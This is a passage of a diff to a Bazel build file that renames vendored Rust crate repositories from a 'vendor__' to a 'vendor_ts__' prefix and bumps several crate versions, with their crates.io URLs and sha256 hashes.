@@ def crate_repositories(): maybe( http_archive, - name = "vendor__hashbrown-0.14.5", + name = "vendor_ts__hashbrown-0.14.5", sha256 = "e5274423e17b7c9fc20b6e7e208532f9b19825d82dfd615708b70edd83df41f1", type = "tar.gz", urls = ["https://static.crates.io/crates/hashbrown/0.14.5/download"], 
@@ -1415,7 +1426,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__hashbrown-0.15.2", + name = "vendor_ts__hashbrown-0.15.2", sha256 = "bf151400ff0baff5465007dd2f3e717f3fe502074ca563069ce3a6629d07b289", type = "tar.gz", urls = ["https://static.crates.io/crates/hashbrown/0.15.2/download"], @@ -1425,7 +1436,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__heck-0.4.1", + name = "vendor_ts__heck-0.4.1", sha256 = "95505c38b4572b2d910cecb0281560f54b440a19336cbbcb27bf6ce6adc6f5a8", type = "tar.gz", urls = ["https://static.crates.io/crates/heck/0.4.1/download"], @@ -1435,7 +1446,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__heck-0.5.0", + name = "vendor_ts__heck-0.5.0", sha256 = "2304e00983f87ffb38b55b444b5e3b60a884b5d30c0fca7d82fe33449bbe55ea", type = "tar.gz", urls = ["https://static.crates.io/crates/heck/0.5.0/download"], @@ -1445,7 +1456,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__hermit-abi-0.3.9", + name = "vendor_ts__hermit-abi-0.3.9", sha256 = "d231dfb89cfffdbc30e7fc41579ed6066ad03abda9e567ccafae602b97ec5024", type = "tar.gz", urls = ["https://static.crates.io/crates/hermit-abi/0.3.9/download"], @@ -1455,7 +1466,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__hex-0.4.3", + name = "vendor_ts__hex-0.4.3", sha256 = "7f24254aa9a54b5c858eaee2f5bccdb46aaf0e486a595ed5fd8f86ba55232a70", type = "tar.gz", urls = ["https://static.crates.io/crates/hex/0.4.3/download"], @@ -1465,7 +1476,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__home-0.5.11", + name = "vendor_ts__home-0.5.11", sha256 = "589533453244b0995c858700322199b2becb13b627df2851f64a2775d024abcf", type = "tar.gz", urls = ["https://static.crates.io/crates/home/0.5.11/download"], 
@@ -1475,7 +1486,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__iana-time-zone-0.1.61", + name = "vendor_ts__iana-time-zone-0.1.61", sha256 = "235e081f3925a06703c2d0117ea8b91f042756fd6e7a6e5d901e8ca1a996b220", type = "tar.gz", urls = ["https://static.crates.io/crates/iana-time-zone/0.1.61/download"], @@ -1485,7 +1496,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__iana-time-zone-haiku-0.1.2", + name = "vendor_ts__iana-time-zone-haiku-0.1.2", sha256 = "f31827a206f56af32e590ba56d5d2d085f558508192593743f16b2306495269f", type = "tar.gz", urls = ["https://static.crates.io/crates/iana-time-zone-haiku/0.1.2/download"], @@ -1495,7 +1506,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__ident_case-1.0.1", + name = "vendor_ts__ident_case-1.0.1", sha256 = "b9e0384b61958566e926dc50660321d12159025e767c18e043daf26b70104c39", type = "tar.gz", urls = ["https://static.crates.io/crates/ident_case/1.0.1/download"], @@ -1505,7 +1516,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__indexmap-1.9.3", + name = "vendor_ts__indexmap-1.9.3", sha256 = "bd070e393353796e801d209ad339e89596eb4c8d430d18ede6a1cced8fafbd99", type = "tar.gz", urls = ["https://static.crates.io/crates/indexmap/1.9.3/download"], @@ -1515,7 +1526,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__indexmap-2.7.0", + name = "vendor_ts__indexmap-2.7.0", sha256 = "62f822373a4fe84d4bb149bf54e584a7f4abec90e072ed49cda0edea5b95471f", type = "tar.gz", urls = ["https://static.crates.io/crates/indexmap/2.7.0/download"], @@ -1525,7 +1536,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__inlinable_string-0.1.15", + name = "vendor_ts__inlinable_string-0.1.15", sha256 = "c8fae54786f62fb2918dcfae3d568594e50eb9b5c25bf04371af6fe7516452fb", type = "tar.gz", urls = ["https://static.crates.io/crates/inlinable_string/0.1.15/download"], 
@@ -1535,17 +1546,17 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__inotify-0.9.6", - sha256 = "f8069d3ec154eb856955c1c0fbffefbf5f3c40a104ec912d4797314c1801abff", + name = "vendor_ts__inotify-0.11.0", + sha256 = "f37dccff2791ab604f9babef0ba14fbe0be30bd368dc541e2b08d07c8aa908f3", type = "tar.gz", - urls = ["https://static.crates.io/crates/inotify/0.9.6/download"], - strip_prefix = "inotify-0.9.6", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.inotify-0.9.6.bazel"), + urls = ["https://static.crates.io/crates/inotify/0.11.0/download"], + strip_prefix = "inotify-0.11.0", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.inotify-0.11.0.bazel"), ) maybe( http_archive, - name = "vendor__inotify-sys-0.1.5", + name = "vendor_ts__inotify-sys-0.1.5", sha256 = "e05c02b5e89bff3b946cedeca278abc628fe811e604f027c45a8aa3cf793d0eb", type = "tar.gz", urls = ["https://static.crates.io/crates/inotify-sys/0.1.5/download"], @@ -1555,7 +1566,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__is_terminal_polyfill-1.70.1", + name = "vendor_ts__is_terminal_polyfill-1.70.1", sha256 = "7943c866cc5cd64cbc25b2e01621d07fa8eb2a1a23160ee81ce38704e97b8ecf", type = "tar.gz", urls = ["https://static.crates.io/crates/is_terminal_polyfill/1.70.1/download"], @@ -1565,7 +1576,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__itertools-0.12.1", + name = "vendor_ts__itertools-0.12.1", sha256 = "ba291022dbbd398a455acf126c1e341954079855bc60dfdda641363bd6922569", type = "tar.gz", urls = ["https://static.crates.io/crates/itertools/0.12.1/download"], @@ -1575,7 +1586,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__itertools-0.14.0", + name = "vendor_ts__itertools-0.14.0", sha256 = "2b192c782037fadd9cfa75548310488aabdbf3d2da73885b31bd0abd03351285", type = "tar.gz", urls = ["https://static.crates.io/crates/itertools/0.14.0/download"], 
@@ -1585,7 +1596,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__itoa-1.0.14", + name = "vendor_ts__itoa-1.0.14", sha256 = "d75a2a4b1b190afb6f5425f10f6a8f959d2ea0b9c2b1d79553551850539e4674", type = "tar.gz", urls = ["https://static.crates.io/crates/itoa/1.0.14/download"], @@ -1595,7 +1606,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__jod-thread-0.1.2", + name = "vendor_ts__jod-thread-0.1.2", sha256 = "8b23360e99b8717f20aaa4598f5a6541efbe30630039fbc7706cf954a87947ae", type = "tar.gz", urls = ["https://static.crates.io/crates/jod-thread/0.1.2/download"], @@ -1605,7 +1616,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__js-sys-0.3.76", + name = "vendor_ts__js-sys-0.3.76", sha256 = "6717b6b5b077764fb5966237269cb3c64edddde4b14ce42647430a78ced9e7b7", type = "tar.gz", urls = ["https://static.crates.io/crates/js-sys/0.3.76/download"], @@ -1615,7 +1626,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__kqueue-1.0.8", + name = "vendor_ts__kqueue-1.0.8", sha256 = "7447f1ca1b7b563588a205fe93dea8df60fd981423a768bc1c0ded35ed147d0c", type = "tar.gz", urls = ["https://static.crates.io/crates/kqueue/1.0.8/download"], @@ -1625,7 +1636,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__kqueue-sys-1.0.4", + name = "vendor_ts__kqueue-sys-1.0.4", sha256 = "ed9625ffda8729b85e45cf04090035ac368927b8cebc34898e7c120f52e4838b", type = "tar.gz", urls = ["https://static.crates.io/crates/kqueue-sys/1.0.4/download"], @@ -1635,7 +1646,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__la-arena-0.3.1", + name = "vendor_ts__la-arena-0.3.1", sha256 = "3752f229dcc5a481d60f385fa479ff46818033d881d2d801aa27dffcfb5e8306", type = "tar.gz", urls = ["https://static.crates.io/crates/la-arena/0.3.1/download"], 
@@ -1645,7 +1656,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__lazy_static-1.5.0", + name = "vendor_ts__lazy_static-1.5.0", sha256 = "bbd2bcb4c963f2ddae06a2efc7e9f3591312473c50c6685e1f298068316e66fe", type = "tar.gz", urls = ["https://static.crates.io/crates/lazy_static/1.5.0/download"], @@ -1655,7 +1666,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__libc-0.2.169", + name = "vendor_ts__libc-0.2.169", sha256 = "b5aba8db14291edd000dfcc4d620c7ebfb122c613afb886ca8803fa4e128a20a", type = "tar.gz", urls = ["https://static.crates.io/crates/libc/0.2.169/download"], @@ -1665,7 +1676,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__libredox-0.1.3", + name = "vendor_ts__libredox-0.1.3", sha256 = "c0ff37bd590ca25063e35af745c343cb7a0271906fb7b37e4813e8f79f00268d", type = "tar.gz", urls = ["https://static.crates.io/crates/libredox/0.1.3/download"], @@ -1675,7 +1686,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__line-index-0.1.2", + name = "vendor_ts__line-index-0.1.2", sha256 = "3e27e0ed5a392a7f5ba0b3808a2afccff16c64933312c84b57618b49d1209bd2", type = "tar.gz", urls = ["https://static.crates.io/crates/line-index/0.1.2/download"], @@ -1685,7 +1696,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__lock_api-0.4.12", + name = "vendor_ts__lock_api-0.4.12", sha256 = "07af8b9cdd281b7915f413fa73f29ebd5d55d0d3f0155584dade1ff18cea1b17", type = "tar.gz", urls = ["https://static.crates.io/crates/lock_api/0.4.12/download"], @@ -1695,7 +1706,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__log-0.3.9", + name = "vendor_ts__log-0.3.9", sha256 = "e19e8d5c34a3e0e2223db8e060f9e8264aeeb5c5fc64a4ee9965c062211c024b", type = "tar.gz", urls = ["https://static.crates.io/crates/log/0.3.9/download"], 
@@ -1705,17 +1716,17 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__log-0.4.22", - sha256 = "a7a70ba024b9dc04c27ea2f0c0548feb474ec5c54bba33a7f72f873a39d07b24", + name = "vendor_ts__log-0.4.25", + sha256 = "04cbf5b083de1c7e0222a7a51dbfdba1cbe1c6ab0b15e29fff3f6c077fd9cd9f", type = "tar.gz", - urls = ["https://static.crates.io/crates/log/0.4.22/download"], - strip_prefix = "log-0.4.22", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.log-0.4.22.bazel"), + urls = ["https://static.crates.io/crates/log/0.4.25/download"], + strip_prefix = "log-0.4.25", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.log-0.4.25.bazel"), ) maybe( http_archive, - name = "vendor__lz4_flex-0.11.3", + name = "vendor_ts__lz4_flex-0.11.3", sha256 = "75761162ae2b0e580d7e7c390558127e5f01b4194debd6221fd8c207fc80e3f5", type = "tar.gz", urls = ["https://static.crates.io/crates/lz4_flex/0.11.3/download"], @@ -1725,7 +1736,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__matchers-0.1.0", + name = "vendor_ts__matchers-0.1.0", sha256 = "8263075bb86c5a1b1427b5ae862e8889656f126e9f77c484496e8b47cf5c5558", type = "tar.gz", urls = ["https://static.crates.io/crates/matchers/0.1.0/download"], @@ -1735,7 +1746,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__memchr-2.7.4", + name = "vendor_ts__memchr-2.7.4", sha256 = "78ca9ab1a0babb1e7d5695e3530886289c18cf2f87ec19a575a0abdce112e3a3", type = "tar.gz", urls = ["https://static.crates.io/crates/memchr/2.7.4/download"], @@ -1745,7 +1756,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__memoffset-0.9.1", + name = "vendor_ts__memoffset-0.9.1", sha256 = "488016bfae457b036d996092f6cb448677611ce4449e970ceaf42695203f218a", type = "tar.gz", urls = ["https://static.crates.io/crates/memoffset/0.9.1/download"], 
@@ -1755,27 +1766,27 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__miniz_oxide-0.8.2", - sha256 = "4ffbe83022cedc1d264172192511ae958937694cd57ce297164951b8b3568394", + name = "vendor_ts__miniz_oxide-0.8.5", + sha256 = "8e3e04debbb59698c15bacbb6d93584a8c0ca9cc3213cb423d31f760d8843ce5", type = "tar.gz", - urls = ["https://static.crates.io/crates/miniz_oxide/0.8.2/download"], - strip_prefix = "miniz_oxide-0.8.2", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.miniz_oxide-0.8.2.bazel"), + urls = ["https://static.crates.io/crates/miniz_oxide/0.8.5/download"], + strip_prefix = "miniz_oxide-0.8.5", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.miniz_oxide-0.8.5.bazel"), ) maybe( http_archive, - name = "vendor__mio-0.8.11", - sha256 = "a4a650543ca06a924e8b371db273b2756685faae30f8487da1b56505a8f78b0c", + name = "vendor_ts__mio-1.0.3", + sha256 = "2886843bf800fba2e3377cff24abf6379b4c4d5c6681eaf9ea5b0d15090450bd", type = "tar.gz", - urls = ["https://static.crates.io/crates/mio/0.8.11/download"], - strip_prefix = "mio-0.8.11", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.mio-0.8.11.bazel"), + urls = ["https://static.crates.io/crates/mio/1.0.3/download"], + strip_prefix = "mio-1.0.3", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.mio-1.0.3.bazel"), ) maybe( http_archive, - name = "vendor__miow-0.6.0", + name = "vendor_ts__miow-0.6.0", sha256 = "359f76430b20a79f9e20e115b3428614e654f04fab314482fc0fda0ebd3c6044", type = "tar.gz", urls = ["https://static.crates.io/crates/miow/0.6.0/download"], @@ -1785,7 +1796,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__mustache-0.9.0", + name = "vendor_ts__mustache-0.9.0", sha256 = "51956ef1c5d20a1384524d91e616fb44dfc7d8f249bf696d49c97dd3289ecab5", type = "tar.gz", urls = ["https://static.crates.io/crates/mustache/0.9.0/download"], 
@@ -1795,7 +1806,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__nohash-hasher-0.2.0", + name = "vendor_ts__nohash-hasher-0.2.0", sha256 = "2bf50223579dc7cdcfb3bfcacf7069ff68243f8c363f62ffa99cf000a6b9c451", type = "tar.gz", urls = ["https://static.crates.io/crates/nohash-hasher/0.2.0/download"], @@ -1805,17 +1816,27 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__notify-6.1.1", - sha256 = "6205bd8bb1e454ad2e27422015fb5e4f2bcc7e08fa8f27058670d208324a4d2d", + name = "vendor_ts__notify-8.0.0", + sha256 = "2fee8403b3d66ac7b26aee6e40a897d85dc5ce26f44da36b8b73e987cc52e943", type = "tar.gz", - urls = ["https://static.crates.io/crates/notify/6.1.1/download"], - strip_prefix = "notify-6.1.1", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.notify-6.1.1.bazel"), + urls = ["https://static.crates.io/crates/notify/8.0.0/download"], + strip_prefix = "notify-8.0.0", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.notify-8.0.0.bazel"), ) maybe( http_archive, - name = "vendor__nu-ansi-term-0.46.0", + name = "vendor_ts__notify-types-2.0.0", + sha256 = "5e0826a989adedc2a244799e823aece04662b66609d96af8dff7ac6df9a8925d", + type = "tar.gz", + urls = ["https://static.crates.io/crates/notify-types/2.0.0/download"], + strip_prefix = "notify-types-2.0.0", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.notify-types-2.0.0.bazel"), + ) + + maybe( + http_archive, + name = "vendor_ts__nu-ansi-term-0.46.0", sha256 = "77a8165726e8236064dbb45459242600304b42a5ea24ee2948e18e023bf7ba84", type = "tar.gz", urls = ["https://static.crates.io/crates/nu-ansi-term/0.46.0/download"], 
@@ -1825,7 +1846,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__num-conv-0.1.0", + name = "vendor_ts__num-conv-0.1.0", sha256 = "51d515d32fb182ee37cda2ccdcb92950d6a3c2893aa280e540671c2cd0f3b1d9", type = "tar.gz", urls = ["https://static.crates.io/crates/num-conv/0.1.0/download"], @@ -1835,7 +1856,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__num-traits-0.2.19", + name = "vendor_ts__num-traits-0.2.19", sha256 = "071dfc062690e90b734c0b2273ce72ad0ffa95f0c74596bc250dcfd960262841", type = "tar.gz", urls = ["https://static.crates.io/crates/num-traits/0.2.19/download"], @@ -1845,7 +1866,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__num_cpus-1.16.0", + name = "vendor_ts__num_cpus-1.16.0", sha256 = "4161fcb6d602d4d2081af7c3a45852d875a03dd337a6bfdd6e06407b61342a43", type = "tar.gz", urls = ["https://static.crates.io/crates/num_cpus/1.16.0/download"], @@ -1855,17 +1876,17 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__once_cell-1.20.2", - sha256 = "1261fe7e33c73b354eab43b1273a57c8f967d0391e80353e51f764ac02cf6775", + name = "vendor_ts__once_cell-1.20.3", + sha256 = "945462a4b81e43c4e3ba96bd7b49d834c6f61198356aa858733bc4acf3cbe62e", type = "tar.gz", - urls = ["https://static.crates.io/crates/once_cell/1.20.2/download"], - strip_prefix = "once_cell-1.20.2", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.once_cell-1.20.2.bazel"), + urls = ["https://static.crates.io/crates/once_cell/1.20.3/download"], + strip_prefix = "once_cell-1.20.3", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.once_cell-1.20.3.bazel"), ) maybe( http_archive, - name = "vendor__oorandom-11.1.4", + name = "vendor_ts__oorandom-11.1.4", sha256 = "b410bbe7e14ab526a0e86877eb47c6996a2bd7746f027ba551028c925390e4e9", type = "tar.gz", urls = ["https://static.crates.io/crates/oorandom/11.1.4/download"], 
@@ -1875,7 +1896,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__os_str_bytes-7.0.0", + name = "vendor_ts__os_str_bytes-7.0.0", sha256 = "7ac44c994af577c799b1b4bd80dc214701e349873ad894d6cdf96f4f7526e0b9", type = "tar.gz", urls = ["https://static.crates.io/crates/os_str_bytes/7.0.0/download"], @@ -1885,7 +1906,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__overload-0.1.1", + name = "vendor_ts__overload-0.1.1", sha256 = "b15813163c1d831bf4a13c3610c05c0d03b39feb07f7e09fa234dac9b15aaf39", type = "tar.gz", urls = ["https://static.crates.io/crates/overload/0.1.1/download"], @@ -1895,7 +1916,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__parking_lot-0.12.3", + name = "vendor_ts__parking_lot-0.12.3", sha256 = "f1bf18183cf54e8d6059647fc3063646a1801cf30896933ec2311622cc4b9a27", type = "tar.gz", urls = ["https://static.crates.io/crates/parking_lot/0.12.3/download"], @@ -1905,7 +1926,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__parking_lot_core-0.9.10", + name = "vendor_ts__parking_lot_core-0.9.10", sha256 = "1e401f977ab385c9e4e3ab30627d6f26d00e2c73eef317493c4ec6d468726cf8", type = "tar.gz", urls = ["https://static.crates.io/crates/parking_lot_core/0.9.10/download"], @@ -1915,7 +1936,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__pear-0.2.9", + name = "vendor_ts__pear-0.2.9", sha256 = "bdeeaa00ce488657faba8ebf44ab9361f9365a97bd39ffb8a60663f57ff4b467", type = "tar.gz", urls = ["https://static.crates.io/crates/pear/0.2.9/download"], @@ -1925,7 +1946,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__pear_codegen-0.2.9", + name = "vendor_ts__pear_codegen-0.2.9", sha256 = "4bab5b985dc082b345f812b7df84e1bef27e7207b39e448439ba8bd69c93f147", type = "tar.gz", urls = ["https://static.crates.io/crates/pear_codegen/0.2.9/download"], 
@@ -1935,7 +1956,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__perf-event-0.4.7", + name = "vendor_ts__perf-event-0.4.7", sha256 = "5396562cd2eaa828445d6d34258ae21ee1eb9d40fe626ca7f51c8dccb4af9d66", type = "tar.gz", urls = ["https://static.crates.io/crates/perf-event/0.4.7/download"], @@ -1945,7 +1966,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__perf-event-open-sys-1.0.1", + name = "vendor_ts__perf-event-open-sys-1.0.1", sha256 = "ce9bedf5da2c234fdf2391ede2b90fabf585355f33100689bc364a3ea558561a", type = "tar.gz", urls = ["https://static.crates.io/crates/perf-event-open-sys/1.0.1/download"], @@ -1955,7 +1976,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__petgraph-0.6.5", + name = "vendor_ts__petgraph-0.6.5", sha256 = "b4c5cc86750666a3ed20bdaf5ca2a0344f9c67674cae0515bec2da16fbaa47db", type = "tar.gz", urls = ["https://static.crates.io/crates/petgraph/0.6.5/download"], @@ -1965,7 +1986,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__pin-project-lite-0.2.16", + name = "vendor_ts__pin-project-lite-0.2.16", sha256 = "3b3cff922bd51709b605d9ead9aa71031d81447142d828eb4a6eba76fe619f9b", type = "tar.gz", urls = ["https://static.crates.io/crates/pin-project-lite/0.2.16/download"], @@ -1975,7 +1996,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__powerfmt-0.2.0", + name = "vendor_ts__powerfmt-0.2.0", sha256 = "439ee305def115ba05938db6eb1644ff94165c5ab5e9420d1c1bcedbba909391", type = "tar.gz", urls = ["https://static.crates.io/crates/powerfmt/0.2.0/download"], @@ -1985,7 +2006,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__ppv-lite86-0.2.20", + name = "vendor_ts__ppv-lite86-0.2.20", sha256 = "77957b295656769bb8ad2b6a6b09d897d94f05c41b069aede1fcdaa675eaea04", type = "tar.gz", urls = ["https://static.crates.io/crates/ppv-lite86/0.2.20/download"], 
@@ -1995,7 +2016,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__proc-macro2-1.0.93", + name = "vendor_ts__proc-macro2-1.0.93", sha256 = "60946a68e5f9d28b0dc1c21bb8a97ee7d018a8b322fa57838ba31cc878e22d99", type = "tar.gz", urls = ["https://static.crates.io/crates/proc-macro2/1.0.93/download"], @@ -2005,7 +2026,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__proc-macro2-diagnostics-0.10.1", + name = "vendor_ts__proc-macro2-diagnostics-0.10.1", sha256 = "af066a9c399a26e020ada66a034357a868728e72cd426f3adcd35f80d88d88c8", type = "tar.gz", urls = ["https://static.crates.io/crates/proc-macro2-diagnostics/0.10.1/download"], @@ -2015,7 +2036,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__quote-1.0.38", + name = "vendor_ts__quote-1.0.38", sha256 = "0e4dccaaaf89514f546c693ddc140f729f958c247918a13380cccc6078391acc", type = "tar.gz", urls = ["https://static.crates.io/crates/quote/1.0.38/download"], 
@@ -2025,367 +2046,367 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__ra-ap-rustc_abi-0.87.0", - sha256 = "28b782af0a7a8df16ddf43cd70da9f17bc3b1ce712c9e4992b6edb16f5f53632", + name = "vendor_ts__ra-ap-rustc_abi-0.97.0", + sha256 = "3829c3355d1681ffeaf1450ec71edcdace6820fe2e86469d8fc1ad45e2c96460", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra-ap-rustc_abi/0.87.0/download"], - strip_prefix = "ra-ap-rustc_abi-0.87.0", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra-ap-rustc_abi-0.87.0.bazel"), + urls = ["https://static.crates.io/crates/ra-ap-rustc_abi/0.97.0/download"], + strip_prefix = "ra-ap-rustc_abi-0.97.0", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra-ap-rustc_abi-0.97.0.bazel"), ) maybe( http_archive, - name = "vendor__ra-ap-rustc_index-0.87.0", - sha256 = "ce5742f134960482f543b35ecebec3cacc6d79a9a685713518b4d8d70c5f9aa8", + name = "vendor_ts__ra-ap-rustc_hashes-0.97.0", + sha256 = "1bd4d6d4c434bec08e02370a4f64a4985312097215a62e82d0f757f3a98e502e", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra-ap-rustc_index/0.87.0/download"], - strip_prefix = "ra-ap-rustc_index-0.87.0", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra-ap-rustc_index-0.87.0.bazel"), + urls = ["https://static.crates.io/crates/ra-ap-rustc_hashes/0.97.0/download"], + strip_prefix = "ra-ap-rustc_hashes-0.97.0", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra-ap-rustc_hashes-0.97.0.bazel"), ) maybe( http_archive, - name = "vendor__ra-ap-rustc_index_macros-0.87.0", - sha256 = "d7ea011fcf68309a8835ad01d91c032cb18444617b00e2cab21d45b208164441", + name = "vendor_ts__ra-ap-rustc_index-0.97.0", + sha256 = "bad6fc4bd7522e31096e2de5b0351144fe0684b608791ee26c842bf2da1b19ae", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra-ap-rustc_index_macros/0.87.0/download"], - strip_prefix = 
"ra-ap-rustc_index_macros-0.87.0", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra-ap-rustc_index_macros-0.87.0.bazel"), + urls = ["https://static.crates.io/crates/ra-ap-rustc_index/0.97.0/download"], + strip_prefix = "ra-ap-rustc_index-0.97.0", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra-ap-rustc_index-0.97.0.bazel"), ) maybe( http_archive, - name = "vendor__ra-ap-rustc_lexer-0.87.0", - sha256 = "eb76f0a4d4c20859e41f0a23bff0f37ab9ca9171c214a6c7dd72ea69434865dc", + name = "vendor_ts__ra-ap-rustc_index_macros-0.97.0", + sha256 = "cfb234e1f84b92be45276c3025bee18789e9bc95bec8789bec961e78edb01c52", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra-ap-rustc_lexer/0.87.0/download"], - strip_prefix = "ra-ap-rustc_lexer-0.87.0", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra-ap-rustc_lexer-0.87.0.bazel"), + urls = ["https://static.crates.io/crates/ra-ap-rustc_index_macros/0.97.0/download"], + strip_prefix = "ra-ap-rustc_index_macros-0.97.0", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra-ap-rustc_index_macros-0.97.0.bazel"), ) maybe( http_archive, - name = "vendor__ra-ap-rustc_parse_format-0.87.0", - sha256 = "06080bd35078305421a62da77f3c128482d8d44441b6da8ce9d146d1cd9cdb5b", + name = "vendor_ts__ra-ap-rustc_lexer-0.97.0", + sha256 = "7a3a40bd11dc43d1cb110e730b80620cf8102f4cca8920a02b65954da0ed931f", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra-ap-rustc_parse_format/0.87.0/download"], - strip_prefix = "ra-ap-rustc_parse_format-0.87.0", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra-ap-rustc_parse_format-0.87.0.bazel"), + urls = ["https://static.crates.io/crates/ra-ap-rustc_lexer/0.97.0/download"], + strip_prefix = "ra-ap-rustc_lexer-0.97.0", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra-ap-rustc_lexer-0.97.0.bazel"), ) maybe( http_archive, 
- name = "vendor__ra-ap-rustc_pattern_analysis-0.87.0", - sha256 = "68a3154fe4c20c177d7b3c678a2d3a97aba0cca156ddef88959915041889daf0", + name = "vendor_ts__ra-ap-rustc_parse_format-0.97.0", + sha256 = "5feb877478994cb4c0c0c7a5116a352eefc0634aefc8636feb00a893fa5b7135", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra-ap-rustc_pattern_analysis/0.87.0/download"], - strip_prefix = "ra-ap-rustc_pattern_analysis-0.87.0", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra-ap-rustc_pattern_analysis-0.87.0.bazel"), + urls = ["https://static.crates.io/crates/ra-ap-rustc_parse_format/0.97.0/download"], + strip_prefix = "ra-ap-rustc_parse_format-0.97.0", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra-ap-rustc_parse_format-0.97.0.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_base_db-0.0.258", - sha256 = "548b95b278a8f6f888a0bb6cb7bf4201fe920d3800cd99770054e5eb72f3cd6a", + name = "vendor_ts__ra-ap-rustc_pattern_analysis-0.97.0", + sha256 = "a76774d35934d464c4115908cde16f76a4f7e540fe1eea6b79336c556e37bdd3", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_base_db/0.0.258/download"], - strip_prefix = "ra_ap_base_db-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_base_db-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra-ap-rustc_pattern_analysis/0.97.0/download"], + strip_prefix = "ra-ap-rustc_pattern_analysis-0.97.0", + build_file = 